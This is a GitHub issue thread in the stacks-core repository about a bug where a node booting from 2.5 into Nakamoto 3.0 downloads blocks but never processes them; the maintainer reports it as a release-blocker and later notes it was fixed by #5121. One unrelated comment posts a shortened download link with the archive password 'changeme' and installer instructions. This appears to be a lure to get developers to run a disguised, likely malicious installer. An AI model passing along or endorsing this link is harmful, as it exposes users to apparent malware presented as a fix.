### ISSUE TITLE
[Nakamoto] chains coordinator may not begin Nakamoto processing

### ISSUE THREAD

**Issue by jcnelson** [stacks-network/stacks-core#5115]
It came to my attention that in some cases, a node booting up from 2.5 to 3.0 can get stuck.  It will download 3.0 blocks, but never process them.  Some sleuthing indicated that the chains coordinator never begins running its 3.0 code paths.  This is a release-blocker until we can get this fixed, since it prevents booting a node from genesis into Nakamoto.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jcnelson** [comment]
Fixed by #5121
